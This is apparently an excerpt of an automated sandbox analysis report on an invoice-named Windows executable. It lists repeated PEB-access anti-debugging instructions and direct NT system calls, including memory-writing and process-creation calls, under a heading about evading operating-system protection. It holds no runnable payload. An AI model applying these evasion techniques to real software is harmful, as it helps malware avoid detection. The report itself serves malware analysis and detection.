    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35437623 mov eax, dword ptr fs:[00000030h]2_2_35437623
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DD62C mov ecx, dword ptr fs:[00000030h]2_2_354DD62C
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DD62C mov ecx, dword ptr fs:[00000030h]2_2_354DD62C
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DD62C mov eax, dword ptr fs:[00000030h]2_2_354DD62C
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35435622 mov eax, dword ptr fs:[00000030h]2_2_35435622
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35435622 mov eax, dword ptr fs:[00000030h]2_2_35435622
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3546F63F mov eax, dword ptr fs:[00000030h]2_2_3546F63F
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3546F63F mov eax, dword ptr fs:[00000030h]2_2_3546F63F
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545D6D0 mov eax, dword ptr fs:[00000030h]2_2_3545D6D0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354296E0 mov eax, dword ptr fs:[00000030h]2_2_354296E0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354296E0 mov eax, dword ptr fs:[00000030h]2_2_354296E0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354356E0 mov eax, dword ptr fs:[00000030h]2_2_354356E0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354356E0 mov eax, dword ptr fs:[00000030h]2_2_354356E0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354356E0 mov eax, dword ptr fs:[00000030h]2_2_354356E0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354C56E0 mov eax, dword ptr fs:[00000030h]2_2_354C56E0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354C56E0 mov eax, dword ptr fs:[00000030h]2_2_354C56E0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354EF68C mov eax, dword ptr fs:[00000030h]2_2_354EF68C
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354AD69D mov eax, dword ptr fs:[00000030h]2_2_354AD69D
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354C314A mov eax, dword ptr fs:[00000030h]2_2_354C314A
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354C314A mov eax, dword ptr fs:[00000030h]2_2_354C314A
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354C314A mov eax, dword ptr fs:[00000030h]2_2_354C314A
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354C314A mov eax, dword ptr fs:[00000030h]2_2_354C314A
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35503157 mov eax, dword ptr fs:[00000030h]2_2_35503157
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35503157 mov eax, dword ptr fs:[00000030h]2_2_35503157
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35503157 mov eax, dword ptr fs:[00000030h]2_2_35503157
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354CD140 mov eax, dword ptr fs:[00000030h]2_2_354CD140
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354CD140 mov eax, dword ptr fs:[00000030h]2_2_354CD140
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35505149 mov eax, dword ptr fs:[00000030h]2_2_35505149
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3546716D mov eax, dword ptr fs:[00000030h]2_2_3546716D
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3548717A mov eax, dword ptr fs:[00000030h]2_2_3548717A
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3548717A mov eax, dword ptr fs:[00000030h]2_2_3548717A
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545510F mov eax, dword ptr fs:[00000030h]2_2_3545510F
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545510F mov eax, dword ptr fs:[00000030h]2_2_3545510F
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545510F mov eax, dword ptr fs:[00000030h]2_2_3545510F
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545510F mov eax, dword ptr fs:[00000030h]2_2_3545510F
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545510F mov eax, dword ptr fs:[00000030h]2_2_3545510F
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545510F mov eax, dword ptr fs:[00000030h]2_2_3545510F
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545510F mov eax, dword ptr fs:[00000030h]2_2_3545510F
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545510F mov eax, dword ptr fs:[00000030h]2_2_3545510F
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545510F mov eax, dword ptr fs:[00000030h]2_2_3545510F
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545510F mov eax, dword ptr fs:[00000030h]2_2_3545510F
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545510F mov eax, dword ptr fs:[00000030h]2_2_3545510F
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545510F mov eax, dword ptr fs:[00000030h]2_2_3545510F
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545510F mov eax, dword ptr fs:[00000030h]2_2_3545510F
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3543510D mov eax, dword ptr fs:[00000030h]2_2_3543510D
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F113 mov eax, dword ptr fs:[00000030h]2_2_3542F113
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F113 mov eax, dword ptr fs:[00000030h]2_2_3542F113
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F113 mov eax, dword ptr fs:[00000030h]2_2_3542F113
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F113 mov eax, dword ptr fs:[00000030h]2_2_3542F113
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F113 mov eax, dword ptr fs:[00000030h]2_2_3542F113
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F113 mov eax, dword ptr fs:[00000030h]2_2_3542F113
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F113 mov eax, dword ptr fs:[00000030h]2_2_3542F113
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F113 mov eax, dword ptr fs:[00000030h]2_2_3542F113
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F113 mov eax, dword ptr fs:[00000030h]2_2_3542F113
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F113 mov eax, dword ptr fs:[00000030h]2_2_3542F113
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F113 mov eax, dword ptr fs:[00000030h]2_2_3542F113
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F113 mov eax, dword ptr fs:[00000030h]2_2_3542F113
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F113 mov eax, dword ptr fs:[00000030h]2_2_3542F113
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F113 mov eax, dword ptr fs:[00000030h]2_2_3542F113
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F113 mov eax, dword ptr fs:[00000030h]2_2_3542F113
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F113 mov eax, dword ptr fs:[00000030h]2_2_3542F113
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F113 mov eax, dword ptr fs:[00000030h]2_2_3542F113
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F113 mov eax, dword ptr fs:[00000030h]2_2_3542F113
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F113 mov eax, dword ptr fs:[00000030h]2_2_3542F113
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F113 mov eax, dword ptr fs:[00000030h]2_2_3542F113
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542F113 mov eax, dword ptr fs:[00000030h]2_2_3542F113
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35467128 mov eax, dword ptr fs:[00000030h]2_2_35467128
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35467128 mov eax, dword ptr fs:[00000030h]2_2_35467128
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354EF13E mov eax, dword ptr fs:[00000030h]2_2_354EF13E
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354451C0 mov eax, dword ptr fs:[00000030h]2_2_354451C0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354451C0 mov eax, dword ptr fs:[00000030h]2_2_354451C0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354451C0 mov eax, dword ptr fs:[00000030h]2_2_354451C0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354451C0 mov eax, dword ptr fs:[00000030h]2_2_354451C0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545B1E0 mov eax, dword ptr fs:[00000030h]2_2_3545B1E0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545B1E0 mov eax, dword ptr fs:[00000030h]2_2_3545B1E0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545B1E0 mov eax, dword ptr fs:[00000030h]2_2_3545B1E0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545B1E0 mov eax, dword ptr fs:[00000030h]2_2_3545B1E0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545B1E0 mov eax, dword ptr fs:[00000030h]2_2_3545B1E0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545B1E0 mov eax, dword ptr fs:[00000030h]2_2_3545B1E0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545B1E0 mov eax, dword ptr fs:[00000030h]2_2_3545B1E0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354391E5 mov eax, dword ptr fs:[00000030h]2_2_354391E5
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354391E5 mov eax, dword ptr fs:[00000030h]2_2_354391E5
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354291F0 mov eax, dword ptr fs:[00000030h]2_2_354291F0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354291F0 mov eax, dword ptr fs:[00000030h]2_2_354291F0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545F1F0 mov eax, dword ptr fs:[00000030h]2_2_3545F1F0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545F1F0 mov eax, dword ptr fs:[00000030h]2_2_3545F1F0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354CD1F0 mov eax, dword ptr fs:[00000030h]2_2_354CD1F0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35459194 mov eax, dword ptr fs:[00000030h]2_2_35459194
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35471190 mov eax, dword ptr fs:[00000030h]2_2_35471190
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35471190 mov eax, dword ptr fs:[00000030h]2_2_35471190
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_355051B6 mov eax, dword ptr fs:[00000030h]2_2_355051B6
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354631BE mov eax, dword ptr fs:[00000030h]2_2_354631BE
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354631BE mov eax, dword ptr fs:[00000030h]2_2_354631BE
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3550505B mov eax, dword ptr fs:[00000030h]2_2_3550505B
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35431051 mov eax, dword ptr fs:[00000030h]2_2_35431051
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35431051 mov eax, dword ptr fs:[00000030h]2_2_35431051
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354D9060 mov eax, dword ptr fs:[00000030h]2_2_354D9060
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35437072 mov eax, dword ptr fs:[00000030h]2_2_35437072
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35455004 mov eax, dword ptr fs:[00000030h]2_2_35455004
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35455004 mov ecx, dword ptr fs:[00000030h]2_2_35455004
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542D02D mov eax, dword ptr fs:[00000030h]2_2_3542D02D
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3544B0D0 mov eax, dword ptr fs:[00000030h]2_2_3544B0D0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542B0D6 mov eax, dword ptr fs:[00000030h]2_2_3542B0D6
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542B0D6 mov eax, dword ptr fs:[00000030h]2_2_3542B0D6
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542B0D6 mov eax, dword ptr fs:[00000030h]2_2_3542B0D6
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542B0D6 mov eax, dword ptr fs:[00000030h]2_2_3542B0D6
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3546D0F0 mov eax, dword ptr fs:[00000030h]2_2_3546D0F0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3546D0F0 mov ecx, dword ptr fs:[00000030h]2_2_3546D0F0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354290F8 mov eax, dword ptr fs:[00000030h]2_2_354290F8
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354290F8 mov eax, dword ptr fs:[00000030h]2_2_354290F8
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354290F8 mov eax, dword ptr fs:[00000030h]2_2_354290F8
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354290F8 mov eax, dword ptr fs:[00000030h]2_2_354290F8
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B7090 mov eax, dword ptr fs:[00000030h]2_2_354B7090
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354EB0AF mov eax, dword ptr fs:[00000030h]2_2_354EB0AF
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_355050B7 mov eax, dword ptr fs:[00000030h]2_2_355050B7
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DF0A5 mov eax, dword ptr fs:[00000030h]2_2_354DF0A5
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DF0A5 mov eax, dword ptr fs:[00000030h]2_2_354DF0A5
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DF0A5 mov eax, dword ptr fs:[00000030h]2_2_354DF0A5
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DF0A5 mov eax, dword ptr fs:[00000030h]2_2_354DF0A5
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DF0A5 mov eax, dword ptr fs:[00000030h]2_2_354DF0A5
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DF0A5 mov eax, dword ptr fs:[00000030h]2_2_354DF0A5
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354DF0A5 mov eax, dword ptr fs:[00000030h]2_2_354DF0A5
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3543B360 mov eax, dword ptr fs:[00000030h]2_2_3543B360
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3543B360 mov eax, dword ptr fs:[00000030h]2_2_3543B360
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3543B360 mov eax, dword ptr fs:[00000030h]2_2_3543B360
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3543B360 mov eax, dword ptr fs:[00000030h]2_2_3543B360
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3543B360 mov eax, dword ptr fs:[00000030h]2_2_3543B360
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3543B360 mov eax, dword ptr fs:[00000030h]2_2_3543B360
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35429303 mov eax, dword ptr fs:[00000030h]2_2_35429303
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35429303 mov eax, dword ptr fs:[00000030h]2_2_35429303
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354EF30A mov eax, dword ptr fs:[00000030h]2_2_354EF30A
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B330C mov eax, dword ptr fs:[00000030h]2_2_354B330C
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B330C mov eax, dword ptr fs:[00000030h]2_2_354B330C
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B330C mov eax, dword ptr fs:[00000030h]2_2_354B330C
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354B330C mov eax, dword ptr fs:[00000030h]2_2_354B330C
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35503336 mov eax, dword ptr fs:[00000030h]2_2_35503336
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545332D mov eax, dword ptr fs:[00000030h]2_2_3545332D
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354633D0 mov eax, dword ptr fs:[00000030h]2_2_354633D0
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35431380 mov eax, dword ptr fs:[00000030h]2_2_35431380
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35431380 mov eax, dword ptr fs:[00000030h]2_2_35431380
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35431380 mov eax, dword ptr fs:[00000030h]2_2_35431380
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35431380 mov eax, dword ptr fs:[00000030h]2_2_35431380
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_35431380 mov eax, dword ptr fs:[00000030h]2_2_35431380
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3544F380 mov eax, dword ptr fs:[00000030h]2_2_3544F380
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3544F380 mov eax, dword ptr fs:[00000030h]2_2_3544F380
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3544F380 mov eax, dword ptr fs:[00000030h]2_2_3544F380
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3544F380 mov eax, dword ptr fs:[00000030h]2_2_3544F380
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3544F380 mov eax, dword ptr fs:[00000030h]2_2_3544F380
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3544F380 mov eax, dword ptr fs:[00000030h]2_2_3544F380
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354EF38A mov eax, dword ptr fs:[00000030h]2_2_354EF38A
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354393A6 mov eax, dword ptr fs:[00000030h]2_2_354393A6
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354393A6 mov eax, dword ptr fs:[00000030h]2_2_354393A6
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354F124C mov eax, dword ptr fs:[00000030h]2_2_354F124C
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354F124C mov eax, dword ptr fs:[00000030h]2_2_354F124C
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354F124C mov eax, dword ptr fs:[00000030h]2_2_354F124C
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354F124C mov eax, dword ptr fs:[00000030h]2_2_354F124C
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354EF247 mov eax, dword ptr fs:[00000030h]2_2_354EF247
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3545F24A mov eax, dword ptr fs:[00000030h]2_2_3545F24A
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354AD250 mov eax, dword ptr fs:[00000030h]2_2_354AD250
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_354AD250 mov ecx, dword ptr fs:[00000030h]2_2_354AD250
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542B273 mov eax, dword ptr fs:[00000030h]2_2_3542B273
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542B273 mov eax, dword ptr fs:[00000030h]2_2_3542B273
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exeCode function: 2_2_3542B273 mov eax, dword ptr fs:[00000030h]2_2_3542B273

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe | NtAllocateVirtualMemory: Direct from: 0x776D2B0C
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe | NtOpenSection: Direct from: 0x776D2D2C
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe | NtQueryVolumeInformationFile: Direct from: 0x776D2E4C
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe | NtDeviceIoControlFile: Direct from: 0x776D2A0C
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe | NtCreateFile: Direct from: 0x776D2F0C
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe | NtAllocateVirtualMemory: Direct from: 0x776D3BBC
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe | NtQueryInformationToken: Direct from: 0x776D2BCC
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe | NtOpenFile: Direct from: 0x776D2CEC
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe | NtWriteVirtualMemory: Direct from: 0x776D482C
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe | NtProtectVirtualMemory: Direct from: 0x776D2EBC
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe | NtCreateUserProcess: Direct from: 0x776D363C
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe | NtQueryInformationProcess: Direct from: 0x776D2B46
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe | NtResumeThread: Direct from: 0x776D2EDC
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe | NtSetInformationThread: Direct from: 0x776C6319
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe | NtAllocateVirtualMemory: Direct from: 0x776D480C
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe | NtQueryAttributesFile: Direct from: 0x776D2D8C
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe | NtSetInformationThread: Direct from: 0x776D2A6C
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe | NtCreateKey: Direct from: 0x776D2B8C
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe | NtClose: Direct from: 0x776D2A8C
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe | NtQuerySystemInformation: Direct from: 0x776D47EC
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe | NtReadFile: Direct from: 0x776D29FC
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe | NtQuerySystemInformation: Direct from: 0x776D2D1C
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe | NtAllocateVirtualMemory: Direct from: 0x776D2B1C
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe | NtResumeThread: Direct from: 0x776D35CC
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe | NtOpenKeyEx: Direct from: 0x776D2ABC
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe | NtDelayExecution: Direct from: 0x776D2CFC
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe | NtProtectVirtualMemory: Direct from: 0x776C7A4E
    Source: C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe | NtReadVirtualMemory: Direct from: 0x776D2DAC
